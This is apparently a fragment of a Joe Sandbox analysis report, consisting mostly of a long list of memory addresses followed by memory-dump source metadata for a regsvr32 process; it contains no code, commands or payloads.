                                                                                                        0x7ffc28917c8f
                                                                                                        0x7ffc28917c97
                                                                                                        0x7ffc28917c9f
                                                                                                        0x7ffc28917ca7
                                                                                                        0x7ffc28917caf
                                                                                                        0x7ffc28917cb7
                                                                                                        0x7ffc28917cbf
                                                                                                        0x7ffc28917cc7
                                                                                                        0x7ffc28917ccf
                                                                                                        0x7ffc28917cd7
                                                                                                        0x7ffc28917cdf
                                                                                                        0x7ffc28917ce7
                                                                                                        0x7ffc28917cef
                                                                                                        0x7ffc28917cf7
                                                                                                        0x7ffc28917cff
                                                                                                        0x7ffc28917d07
                                                                                                        0x7ffc28917d0f
                                                                                                        0x7ffc28917d17
                                                                                                        0x7ffc28917d1f
                                                                                                        0x7ffc28917d27
                                                                                                        0x7ffc28917d2f
                                                                                                        0x7ffc28917d37
                                                                                                        0x7ffc28917d3f
                                                                                                        0x7ffc28917d47
                                                                                                        0x7ffc28917d4f
                                                                                                        0x7ffc28917d57
                                                                                                        0x7ffc28917d5f
                                                                                                        0x7ffc28917d67
                                                                                                        0x7ffc28917d6f
                                                                                                        0x7ffc28917d77
                                                                                                        0x7ffc28917d7f
                                                                                                        0x7ffc28917d87
                                                                                                        0x7ffc28917d8f
                                                                                                        0x7ffc28917d97
                                                                                                        0x7ffc28917d9f
                                                                                                        0x7ffc28917da7
                                                                                                        0x7ffc28917daf
                                                                                                        0x7ffc28917db7
                                                                                                        0x7ffc28917dbf
                                                                                                        0x7ffc28917dc7
                                                                                                        0x7ffc28917dcf
                                                                                                        0x7ffc28917dd7
                                                                                                        0x7ffc28917ddf
                                                                                                        0x7ffc28917de7
                                                                                                        0x7ffc28917def
                                                                                                        0x7ffc28917df7
                                                                                                        0x7ffc28917dff
                                                                                                        0x7ffc28917e07
                                                                                                        0x7ffc28917e0f
                                                                                                        0x7ffc28917e17
                                                                                                        0x7ffc28917e1f
                                                                                                        0x7ffc28917e27
                                                                                                        0x7ffc28917e2f
                                                                                                        0x7ffc28917e37
                                                                                                        0x7ffc28917e3f
                                                                                                        0x7ffc28917e47
                                                                                                        0x7ffc28917e4f
                                                                                                        0x7ffc28917e57
                                                                                                        0x7ffc28917e5f
                                                                                                        0x7ffc28917e67
                                                                                                        0x7ffc28917e6f
                                                                                                        0x7ffc28917e77
                                                                                                        0x7ffc28917e7f
                                                                                                        0x7ffc28917e87
                                                                                                        0x7ffc28917e8f
                                                                                                        0x7ffc28917e97
                                                                                                        0x7ffc28917e9f
                                                                                                        0x7ffc28917ea7
                                                                                                        0x7ffc28917eaf
                                                                                                        0x7ffc28917eb7
                                                                                                        0x7ffc28917ebf
                                                                                                        0x7ffc28917ec7
                                                                                                        0x7ffc28917ecf
                                                                                                        0x7ffc28917ed7
                                                                                                        0x7ffc28917edf
                                                                                                        0x7ffc28917ee7
                                                                                                        0x7ffc28917eef
                                                                                                        0x7ffc28917ef7
                                                                                                        0x7ffc28917eff
                                                                                                        0x7ffc28917f07
                                                                                                        0x7ffc28917f0f
                                                                                                        0x7ffc28917f17
                                                                                                        0x7ffc28917f1f
                                                                                                        0x7ffc28917f27
                                                                                                        0x7ffc28917f2f
                                                                                                        0x7ffc28917f37
                                                                                                        0x7ffc28917f3f
                                                                                                        0x7ffc28917f47
                                                                                                        0x7ffc28917f4f
                                                                                                        0x7ffc28917f57
                                                                                                        0x7ffc28917f5f
                                                                                                        0x7ffc28917f67
                                                                                                        0x7ffc28917f6f
                                                                                                        0x7ffc28917f77
                                                                                                        0x7ffc28917f7f
                                                                                                        0x7ffc28917f87
                                                                                                        0x7ffc28917f8f
                                                                                                        0x7ffc28917f97
                                                                                                        0x7ffc28917f9f
                                                                                                        0x7ffc28917fa7
                                                                                                        0x7ffc28917faf
                                                                                                        0x7ffc28917fb7
                                                                                                        0x7ffc28917fbf
                                                                                                        0x7ffc28917fc7
                                                                                                        0x7ffc28917fcf
                                                                                                        0x7ffc28917fd7
                                                                                                        0x7ffc28917fdf
                                                                                                        0x7ffc28917fe7
                                                                                                        0x7ffc28917fef
                                                                                                        0x7ffc28917ff7
                                                                                                        0x7ffc28917fff
                                                                                                        0x7ffc28918007
                                                                                                        0x7ffc2891800f
                                                                                                        0x7ffc28918017
                                                                                                        0x7ffc2891801f
                                                                                                        0x7ffc28918027
                                                                                                        0x7ffc2891802f
                                                                                                        0x7ffc28918037
                                                                                                        0x7ffc2891803f
                                                                                                        0x7ffc28918047
                                                                                                        0x7ffc2891804f
                                                                                                        0x7ffc28918057
                                                                                                        0x7ffc2891805f
                                                                                                        0x7ffc28918067
                                                                                                        0x7ffc2891806f
                                                                                                        0x7ffc28918077
                                                                                                        0x7ffc2891807f
                                                                                                        0x7ffc28918087
                                                                                                        0x7ffc2891808f
                                                                                                        0x7ffc28918097
                                                                                                        0x7ffc2891809f
                                                                                                        0x7ffc289180a7
                                                                                                        0x7ffc289180af
                                                                                                        0x7ffc289180b7
                                                                                                        0x7ffc289180bf
                                                                                                        0x7ffc289180c7
                                                                                                        0x7ffc289180cf
                                                                                                        0x7ffc289180d7
                                                                                                        0x7ffc289180df
                                                                                                        0x7ffc289180e7
                                                                                                        0x7ffc289180ef
                                                                                                        0x7ffc289180f7
                                                                                                        0x7ffc289180ff
                                                                                                        0x7ffc28918107
                                                                                                        0x7ffc2891810f
                                                                                                        0x7ffc28918117
                                                                                                        0x7ffc2891811f
                                                                                                        0x7ffc28918127
                                                                                                        0x7ffc2891812f
                                                                                                        0x7ffc28918137
                                                                                                        0x7ffc2891813f
                                                                                                        0x7ffc28918147
                                                                                                        0x7ffc2891814f
                                                                                                        0x7ffc28918157
                                                                                                        0x7ffc2891815f
                                                                                                        0x7ffc28918167
                                                                                                        0x7ffc2891816f
                                                                                                        0x7ffc28918177
                                                                                                        0x7ffc2891817f
                                                                                                        0x7ffc28918187
                                                                                                        0x7ffc2891818f
                                                                                                        0x7ffc28918197
                                                                                                        0x7ffc2891819f
                                                                                                        0x7ffc289181a7
                                                                                                        0x7ffc289181af
                                                                                                        0x7ffc289181b7
                                                                                                        0x7ffc289181bf
                                                                                                        0x7ffc289181c7
                                                                                                        0x7ffc289181cf
                                                                                                        0x7ffc289181d7
                                                                                                        0x7ffc289181df
                                                                                                        0x7ffc289181e7
                                                                                                        0x7ffc289181ef
                                                                                                        0x7ffc289181f7
                                                                                                        0x7ffc289181ff
                                                                                                        0x7ffc28918207
                                                                                                        0x7ffc2891820f
                                                                                                        0x7ffc28918217
                                                                                                        0x7ffc2891821f
                                                                                                        0x7ffc28918227
                                                                                                        0x7ffc2891822f
                                                                                                        0x7ffc28918237
                                                                                                        0x7ffc2891823f
                                                                                                        0x7ffc28918247
                                                                                                        0x7ffc2891824f
                                                                                                        0x7ffc28918257
                                                                                                        0x7ffc2891825f
                                                                                                        0x7ffc28918267
                                                                                                        0x7ffc2891826f
                                                                                                        0x7ffc28918277
                                                                                                        0x7ffc2891827f
                                                                                                        0x7ffc28918287
                                                                                                        0x7ffc2891828f
                                                                                                        0x7ffc28918297
                                                                                                        0x7ffc2891829f
                                                                                                        0x7ffc289182a7
                                                                                                        0x7ffc289182af
                                                                                                        0x7ffc289182b7
                                                                                                        0x7ffc289182bf
                                                                                                        0x7ffc289182c7
                                                                                                        0x7ffc289182cf
                                                                                                        0x7ffc289182d7
                                                                                                        0x7ffc289182df
                                                                                                        0x7ffc289182e7
                                                                                                        0x7ffc289182ef
                                                                                                        0x7ffc289182f7
                                                                                                        0x7ffc289182ff
                                                                                                        0x7ffc28918307
                                                                                                        0x7ffc2891830f
                                                                                                        0x7ffc28918317
                                                                                                        0x7ffc2891831f
                                                                                                        0x7ffc28918327
                                                                                                        0x7ffc2891832f
                                                                                                        0x7ffc28918337
                                                                                                        0x7ffc2891833f
                                                                                                        0x7ffc28918347
                                                                                                        0x7ffc2891834f
                                                                                                        0x7ffc28918357
                                                                                                        0x7ffc2891835f
                                                                                                        0x7ffc28918367
                                                                                                        0x7ffc2891836f
                                                                                                        0x7ffc28918377
                                                                                                        0x7ffc2891837f
                                                                                                        0x7ffc28918387
                                                                                                        0x7ffc2891838f
                                                                                                        0x7ffc28918397
                                                                                                        0x7ffc2891839f
                                                                                                        0x7ffc289183a7
                                                                                                        0x7ffc289183af
                                                                                                        0x7ffc289183b7
                                                                                                        0x7ffc289183bf
                                                                                                        0x7ffc289183c7
                                                                                                        0x7ffc289183cf
                                                                                                        0x7ffc289183d7
                                                                                                        0x7ffc289183df
                                                                                                        0x7ffc289183e7
                                                                                                        0x7ffc289183ef
                                                                                                        0x7ffc289183f7
                                                                                                        0x7ffc289183ff
                                                                                                        0x7ffc28918407
                                                                                                        0x7ffc2891840f
                                                                                                        0x7ffc28918417
                                                                                                        0x7ffc2891841f
                                                                                                        0x7ffc28918427
                                                                                                        0x7ffc2891842f
                                                                                                        0x7ffc28918437
                                                                                                        0x7ffc2891843f
                                                                                                        0x7ffc28918447
                                                                                                        0x7ffc2891844f
                                                                                                        0x7ffc28918457
                                                                                                        0x7ffc2891845f
                                                                                                        0x7ffc28918467
                                                                                                        0x7ffc2891846f
                                                                                                        0x7ffc28918477
                                                                                                        0x7ffc2891847f
                                                                                                        0x7ffc28918487
                                                                                                        0x7ffc2891848f
                                                                                                        0x7ffc28918497
                                                                                                        0x7ffc2891849f
                                                                                                        0x7ffc289184a7
                                                                                                        0x7ffc289184af
                                                                                                        0x7ffc289184b7
                                                                                                        0x7ffc289184bf
                                                                                                        0x7ffc289184c7
                                                                                                        0x7ffc289184cf
                                                                                                        0x7ffc289184d7
                                                                                                        0x7ffc289184df
                                                                                                        0x7ffc289184e7
                                                                                                        0x7ffc289184ef
                                                                                                        0x7ffc289184f7
                                                                                                        0x7ffc289184ff
                                                                                                        0x7ffc28918507
                                                                                                        0x7ffc2891850f
                                                                                                        0x7ffc28918517
                                                                                                        0x7ffc2891851f
                                                                                                        0x7ffc28918527
                                                                                                        0x7ffc2891852f
                                                                                                        0x7ffc28918537
                                                                                                        0x7ffc2891853f
                                                                                                        0x7ffc28918547
                                                                                                        0x7ffc2891854f
                                                                                                        0x7ffc28918557
                                                                                                        0x7ffc2891855f
                                                                                                        0x7ffc28918567
                                                                                                        0x7ffc2891856f
                                                                                                        0x7ffc28918577
                                                                                                        0x7ffc2891857f
                                                                                                        0x7ffc28918587
                                                                                                        0x7ffc2891858f
                                                                                                        0x7ffc28918597
                                                                                                        0x7ffc2891859f
                                                                                                        0x7ffc289185a7
                                                                                                        0x7ffc289185af
                                                                                                        0x7ffc289185b7
                                                                                                        0x7ffc289185bf
                                                                                                        0x7ffc289185c7
                                                                                                        0x7ffc289185cf
                                                                                                        0x7ffc289185d7
                                                                                                        0x7ffc289185df
                                                                                                        0x7ffc289185e7
                                                                                                        0x7ffc289185ef
                                                                                                        0x7ffc289185f7
                                                                                                        0x7ffc289185ff
                                                                                                        0x7ffc28918607
                                                                                                        0x7ffc2891860f
                                                                                                        0x7ffc28918617
                                                                                                        0x7ffc2891861f
                                                                                                        0x7ffc28918627
                                                                                                        0x7ffc2891862f
                                                                                                        0x7ffc28918637
                                                                                                        0x7ffc2891863f
                                                                                                        0x7ffc28918647
                                                                                                        0x7ffc2891864f
                                                                                                        0x7ffc28918657
                                                                                                        0x7ffc2891865f
                                                                                                        0x7ffc28918667
                                                                                                        0x7ffc2891866f
                                                                                                        0x7ffc28918677
                                                                                                        0x7ffc2891867f
                                                                                                        0x7ffc28918687
                                                                                                        0x7ffc2891868f
                                                                                                        0x7ffc28918697
                                                                                                        0x7ffc2891869f
                                                                                                        0x7ffc289186a7
                                                                                                        0x7ffc289186af
                                                                                                        0x7ffc289186b7
                                                                                                        0x7ffc289186bf
                                                                                                        0x7ffc289186c7
                                                                                                        0x7ffc289186cf
                                                                                                        0x7ffc289186d7
                                                                                                        0x7ffc289186df
                                                                                                        0x7ffc289186e7
                                                                                                        0x7ffc289186ef
                                                                                                        0x7ffc289186f7
                                                                                                        0x7ffc289186ff
                                                                                                        0x7ffc28918707
                                                                                                        0x7ffc2891870f
                                                                                                        0x7ffc28918717
                                                                                                        0x7ffc2891871f
                                                                                                        0x7ffc28918727
                                                                                                        0x7ffc2891872f
                                                                                                        0x7ffc28918737
                                                                                                        0x7ffc2891873f
                                                                                                        0x7ffc28918747
                                                                                                        0x7ffc2891874f
                                                                                                        0x7ffc28918757
                                                                                                        0x7ffc2891875f
                                                                                                        0x7ffc28918767
                                                                                                        0x7ffc2891876f
                                                                                                        0x7ffc28918777
                                                                                                        0x7ffc2891877f
                                                                                                        0x7ffc28918787
                                                                                                        0x7ffc2891878f
                                                                                                        0x7ffc28918797
                                                                                                        0x7ffc2891879f
                                                                                                        0x7ffc289187a7
                                                                                                        0x7ffc289187af
                                                                                                        0x7ffc289187b7
                                                                                                        0x7ffc289187bf
                                                                                                        0x7ffc289187c7
                                                                                                        0x7ffc289187cf
                                                                                                        0x7ffc289187d7
                                                                                                        0x7ffc289187df
                                                                                                        0x7ffc289187e7
                                                                                                        0x7ffc289187ef
                                                                                                        0x7ffc289187f7
                                                                                                        0x7ffc289187ff
                                                                                                        0x7ffc28918807
                                                                                                        0x7ffc2891880f
                                                                                                        0x7ffc28918817
                                                                                                        0x7ffc2891881f
                                                                                                        0x7ffc28918827
                                                                                                        0x7ffc2891882f
                                                                                                        0x7ffc28918837
                                                                                                        0x7ffc2891883f
                                                                                                        0x7ffc28918847
                                                                                                        0x7ffc2891884f
                                                                                                        0x7ffc28918857
                                                                                                        0x7ffc2891885f
                                                                                                        0x7ffc28918867
                                                                                                        0x7ffc2891886f
                                                                                                        0x7ffc28918877
                                                                                                        0x7ffc2891887f
                                                                                                        0x7ffc28918887
                                                                                                        0x7ffc2891888f
                                                                                                        0x7ffc28918897
                                                                                                        0x7ffc2891889f
                                                                                                        0x7ffc289188a7
                                                                                                        0x7ffc289188af
                                                                                                        0x7ffc289188b7
                                                                                                        0x7ffc289188bf
                                                                                                        0x7ffc289188c7
                                                                                                        0x7ffc289188cf
                                                                                                        0x7ffc289188d7
                                                                                                        0x7ffc289188df
                                                                                                        0x7ffc289188e7
                                                                                                        0x7ffc289188ef
                                                                                                        0x7ffc289188f7
                                                                                                        0x7ffc289188ff
                                                                                                        0x7ffc28918907
                                                                                                        0x7ffc2891890f
                                                                                                        0x7ffc28918917
                                                                                                        0x7ffc2891891f
                                                                                                        0x7ffc28918927
                                                                                                        0x7ffc2891892f
                                                                                                        0x7ffc28918937
                                                                                                        0x7ffc2891893f
                                                                                                        0x7ffc28918947
                                                                                                        0x7ffc2891894f
                                                                                                        0x7ffc28918957
                                                                                                        0x7ffc2891895f
                                                                                                        0x7ffc28918967
                                                                                                        0x7ffc2891896f
                                                                                                        0x7ffc28918977
                                                                                                        0x7ffc2891897f
                                                                                                        0x7ffc28918987
                                                                                                        0x7ffc2891898f
                                                                                                        0x7ffc28918997
                                                                                                        0x7ffc2891899f
                                                                                                        0x7ffc289189a7
                                                                                                        0x7ffc289189af
                                                                                                        0x7ffc289189b7
                                                                                                        0x7ffc289189bf
                                                                                                        0x7ffc289189c7
                                                                                                        0x7ffc289189cf
                                                                                                        0x7ffc289189d7
                                                                                                        0x7ffc289189df
                                                                                                        0x7ffc289189e7
                                                                                                        0x7ffc289189ef
                                                                                                        0x7ffc289189f7
                                                                                                        0x7ffc289189ff
                                                                                                        0x7ffc28918a07
                                                                                                        0x7ffc28918a0f
                                                                                                        0x7ffc28918a17
                                                                                                        0x7ffc28918a1f
                                                                                                        0x7ffc28918a27
                                                                                                        0x7ffc28918a2f
                                                                                                        0x7ffc28918a37
                                                                                                        0x7ffc28918a3f
                                                                                                        0x7ffc28918a47
                                                                                                        0x7ffc28918a4f
                                                                                                        0x7ffc28918a57
                                                                                                        0x7ffc28918a5f
                                                                                                        0x7ffc28918a67
                                                                                                        0x7ffc28918a6f
                                                                                                        0x7ffc28918a77
                                                                                                        0x7ffc28918a7f
                                                                                                        0x7ffc28918a87
                                                                                                        0x7ffc28918a8f
                                                                                                        0x7ffc28918a97
                                                                                                        0x7ffc28918a9f
                                                                                                        0x7ffc28918aa7
                                                                                                        0x7ffc28918aaf
                                                                                                        0x7ffc28918ab7
                                                                                                        0x7ffc28918abf
                                                                                                        0x7ffc28918ac7
                                                                                                        0x7ffc28918acf
                                                                                                        0x7ffc28918ad7
                                                                                                        0x7ffc28918adf
                                                                                                        0x7ffc28918ae7
                                                                                                        0x7ffc28918aef
                                                                                                        0x7ffc28918af7
                                                                                                        0x7ffc28918aff
                                                                                                        0x7ffc28918b07
                                                                                                        0x7ffc28918b0f
                                                                                                        0x7ffc28918b17
                                                                                                        0x7ffc28918b1f
                                                                                                        0x7ffc28918b27
                                                                                                        0x7ffc28918b2f
                                                                                                        0x7ffc28918b37
                                                                                                        0x7ffc28918b3f
                                                                                                        0x7ffc28918b47
                                                                                                        0x7ffc28918b4f
                                                                                                        0x7ffc28918b57
                                                                                                        0x7ffc28918b5f
                                                                                                        0x7ffc28918b67
                                                                                                        0x7ffc28918b6f
                                                                                                        0x7ffc28918b77
                                                                                                        0x7ffc28918b7f
                                                                                                        0x7ffc28918b87
                                                                                                        0x7ffc28918b8f
                                                                                                        0x7ffc28918b97
                                                                                                        0x7ffc28918b9f
                                                                                                        0x7ffc28918ba7
                                                                                                        0x7ffc28918baf
                                                                                                        0x7ffc28918bb7
                                                                                                        0x7ffc28918bbf
                                                                                                        0x7ffc28918bc7
                                                                                                        0x7ffc28918bcf
                                                                                                        0x7ffc28918bd7
                                                                                                        0x7ffc28918bdf
                                                                                                        0x7ffc28918be7
                                                                                                        0x7ffc28918bef
                                                                                                        0x7ffc28918bf7
                                                                                                        0x7ffc28918bff
                                                                                                        0x7ffc28918c07
                                                                                                        0x7ffc28918c0f
                                                                                                        0x7ffc28918c17
                                                                                                        0x7ffc28918c1f
                                                                                                        0x7ffc28918c27
                                                                                                        0x7ffc28918c2f
                                                                                                        0x7ffc28918c37
                                                                                                        0x7ffc28918c3f
                                                                                                        0x7ffc28918c47
                                                                                                        0x7ffc28918c4f
                                                                                                        0x7ffc28918c57
                                                                                                        0x7ffc28918c5f
                                                                                                        0x7ffc28918c67
                                                                                                        0x7ffc28918c6f
                                                                                                        0x7ffc28918c77
                                                                                                        0x7ffc28918c7f
                                                                                                        0x7ffc28918c87
                                                                                                        0x7ffc28918c8f
                                                                                                        0x7ffc28918c97
                                                                                                        0x7ffc28918c9f
                                                                                                        0x7ffc28918ca7
                                                                                                        0x7ffc28918caf
                                                                                                        0x7ffc28918cb7
                                                                                                        0x7ffc28918cbf
                                                                                                        0x7ffc28918cc7
                                                                                                        0x7ffc28918ccf
                                                                                                        0x7ffc28918cd7
                                                                                                        0x7ffc28918cdf
                                                                                                        0x7ffc28918ce7
                                                                                                        0x7ffc28918cef
                                                                                                        0x7ffc28918cf7
                                                                                                        0x7ffc28918cff
                                                                                                        0x7ffc28918d07
                                                                                                        0x7ffc28918d0f
                                                                                                        0x7ffc28918d17
                                                                                                        0x7ffc28918d1f
                                                                                                        0x7ffc28918d27
                                                                                                        0x7ffc28918d2f
                                                                                                        0x7ffc28918d37
                                                                                                        0x7ffc28918d3f
                                                                                                        0x7ffc28918d47
                                                                                                        0x7ffc28918d4f
                                                                                                        0x7ffc28918d57
                                                                                                        0x7ffc28918d5f
                                                                                                        0x7ffc28918d67
                                                                                                        0x7ffc28918d6f
                                                                                                        0x7ffc28918d77
                                                                                                        0x7ffc28918d7f
                                                                                                        0x7ffc28918d87
                                                                                                        0x7ffc28918d8f
                                                                                                        0x7ffc28918d97
                                                                                                        0x7ffc28918d9f
                                                                                                        0x7ffc28918da7
                                                                                                        0x7ffc28918daf
                                                                                                        0x7ffc28918db7
                                                                                                        0x7ffc28918dbf
                                                                                                        0x7ffc28918dc7
                                                                                                        0x7ffc28918dcf
                                                                                                        0x7ffc28918dd7
                                                                                                        0x7ffc28918ddf
                                                                                                        0x7ffc28918de7
                                                                                                        0x7ffc28918def
                                                                                                        0x7ffc28918df7
                                                                                                        0x7ffc28918dff
                                                                                                        0x7ffc28918e07
                                                                                                        0x7ffc28918e0f
                                                                                                        0x7ffc28918e17
                                                                                                        0x7ffc28918e1f
                                                                                                        0x7ffc28918e27
                                                                                                        0x7ffc28918e2f
                                                                                                        0x7ffc28918e37
                                                                                                        0x7ffc28918e3f
                                                                                                        0x7ffc28918e47
                                                                                                        0x7ffc28918e4f
                                                                                                        0x7ffc28918e57
                                                                                                        0x7ffc28918e5f
                                                                                                        0x7ffc28918e67
                                                                                                        0x7ffc28918e6f
                                                                                                        0x7ffc28918e77
                                                                                                        0x7ffc28918e7f
                                                                                                        0x7ffc28918e87
                                                                                                        0x7ffc28918e8f
                                                                                                        0x7ffc28918e97
                                                                                                        0x7ffc28918e9f
                                                                                                        0x7ffc28918ea7
                                                                                                        0x7ffc28918eaf
                                                                                                        0x7ffc28918eb7
                                                                                                        0x7ffc28918ebf
                                                                                                        0x7ffc28918ec7
                                                                                                        0x7ffc28918ecf
                                                                                                        0x7ffc28918ed7
                                                                                                        0x7ffc28918edf
                                                                                                        0x7ffc28918ee7
                                                                                                        0x7ffc28918eef
                                                                                                        0x7ffc28918ef7
                                                                                                        0x7ffc28918eff
                                                                                                        0x7ffc28918f07
                                                                                                        0x7ffc28918f0f
                                                                                                        0x7ffc28918f17
                                                                                                        0x7ffc28918f1f
                                                                                                        0x7ffc28918f27
                                                                                                        0x7ffc28918f2f
                                                                                                        0x7ffc28918f37
                                                                                                        0x7ffc28918f3f
                                                                                                        0x7ffc28918f47
                                                                                                        0x7ffc28918f4f
                                                                                                        0x7ffc28918f57
                                                                                                        0x7ffc28918f5f
                                                                                                        0x7ffc28918f67
                                                                                                        0x7ffc28918f6f
                                                                                                        0x7ffc28918f77
                                                                                                        0x7ffc28918f7f
                                                                                                        0x7ffc28918f87
                                                                                                        0x7ffc28918f8f
                                                                                                        0x7ffc28918f97
                                                                                                        0x7ffc28918f9f
                                                                                                        0x7ffc28918fa7
                                                                                                        0x7ffc28918faf
                                                                                                        0x7ffc28918fb7
                                                                                                        0x7ffc28918fbf
                                                                                                        0x7ffc28918fc7
                                                                                                        0x7ffc28918fcf
                                                                                                        0x7ffc28918fd7
                                                                                                        0x7ffc28918fdf
                                                                                                        0x7ffc28918fe7
                                                                                                        0x7ffc28918fef
                                                                                                        0x7ffc28918ff7
                                                                                                        0x7ffc28918fff
                                                                                                        0x7ffc28919007
                                                                                                        0x7ffc2891900f
                                                                                                        0x7ffc28919017
                                                                                                        0x7ffc2891901f
                                                                                                        0x7ffc28919027
                                                                                                        0x7ffc2891902f
                                                                                                        0x7ffc28919037
                                                                                                        0x7ffc2891903f
                                                                                                        0x7ffc28919047
                                                                                                        0x7ffc2891904f
                                                                                                        0x7ffc28919057
                                                                                                        0x7ffc2891905f
                                                                                                        0x7ffc28919067
                                                                                                        0x7ffc2891906f
                                                                                                        0x7ffc28919077
                                                                                                        0x7ffc2891907f
                                                                                                        0x7ffc28919087
                                                                                                        0x7ffc2891908f
                                                                                                        0x7ffc28919097
                                                                                                        0x7ffc2891909f
                                                                                                        0x7ffc289190a7
                                                                                                        0x7ffc289190af
                                                                                                        0x7ffc289190b7
                                                                                                        0x7ffc289190bf
                                                                                                        0x7ffc289190c7
                                                                                                        0x7ffc289190cf
                                                                                                        0x7ffc289190d7
                                                                                                        0x7ffc289190df
                                                                                                        0x7ffc289190e7
                                                                                                        0x7ffc289190ef
                                                                                                        0x7ffc289190f7
                                                                                                        0x7ffc289190ff
                                                                                                        0x7ffc28919107
                                                                                                        0x7ffc2891910f
                                                                                                        0x7ffc28919117
                                                                                                        0x7ffc2891911f
                                                                                                        0x7ffc28919127
                                                                                                        0x7ffc2891912f
                                                                                                        0x7ffc28919137
                                                                                                        0x7ffc2891913f
                                                                                                        0x7ffc28919147
                                                                                                        0x7ffc2891914f
                                                                                                        0x7ffc28919157
                                                                                                        0x7ffc2891915f
                                                                                                        0x7ffc28919167
                                                                                                        0x7ffc2891916f
                                                                                                        0x7ffc28919177
                                                                                                        0x7ffc2891917f
                                                                                                        0x7ffc28919187
                                                                                                        0x7ffc2891918f
                                                                                                        0x7ffc28919197
                                                                                                        0x7ffc2891919f
                                                                                                        0x7ffc289191a7
                                                                                                        0x7ffc289191af
                                                                                                        0x7ffc289191b7
                                                                                                        0x7ffc289191bf
                                                                                                        0x7ffc289191c7
                                                                                                        0x7ffc289191cf
                                                                                                        0x7ffc289191d7
                                                                                                        0x7ffc289191df
                                                                                                        0x7ffc289191e7
                                                                                                        0x7ffc289191f8
                                                                                                        0x7ffc28919200
                                                                                                        0x7ffc28919205
                                                                                                        0x7ffc28919212
                                                                                                        0x7ffc2891921a
                                                                                                        0x7ffc28919224
                                                                                                        0x7ffc2891923e
                                                                                                        0x7ffc28919240
                                                                                                        0x7ffc28919248
                                                                                                        0x7ffc2891924a
                                                                                                        0x7ffc28919257
                                                                                                        0x7ffc28919263
                                                                                                        0x7ffc28919270
                                                                                                        0x7ffc28919275
                                                                                                        0x7ffc2891927c
                                                                                                        0x7ffc28919287
                                                                                                        0x7ffc2891928e
                                                                                                        0x7ffc28919294
                                                                                                        0x7ffc2891929d
                                                                                                        0x7ffc2891929f
                                                                                                        0x7ffc289192a2
                                                                                                        0x7ffc289192ae
                                                                                                        0x7ffc289192b6
                                                                                                        0x7ffc289192bb
                                                                                                        0x7ffc289192d5
                                                                                                        0x7ffc289192db
                                                                                                        0x7ffc289192f5
                                                                                                        0x7ffc28919303
                                                                                                        0x7ffc2891931e
                                                                                                        0x7ffc28919320
                                                                                                        0x7ffc28919328
                                                                                                        0x7ffc2891932d
                                                                                                        0x7ffc28919330
                                                                                                        0x7ffc28919342
                                                                                                        0x7ffc28919358
                                                                                                        0x7ffc2891935f
                                                                                                        0x7ffc2891936a
                                                                                                        0x7ffc28919370
                                                                                                        0x7ffc28919372
                                                                                                        0x7ffc28919380
                                                                                                        0x7ffc28919382
                                                                                                        0x7ffc28919391
                                                                                                        0x7ffc28919396
                                                                                                        0x7ffc2891939e
                                                                                                        0x7ffc289193a5
                                                                                                        0x7ffc289193b8
                                                                                                        0x7ffc289193bd
                                                                                                        0x7ffc289193d0
                                                                                                        0x7ffc289193d5
                                                                                                        0x7ffc289193e1
                                                                                                        0x7ffc28919401

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.262208770.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.262199056.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262381671.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262533888.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262549864.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262599923.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262606085.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc28900000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
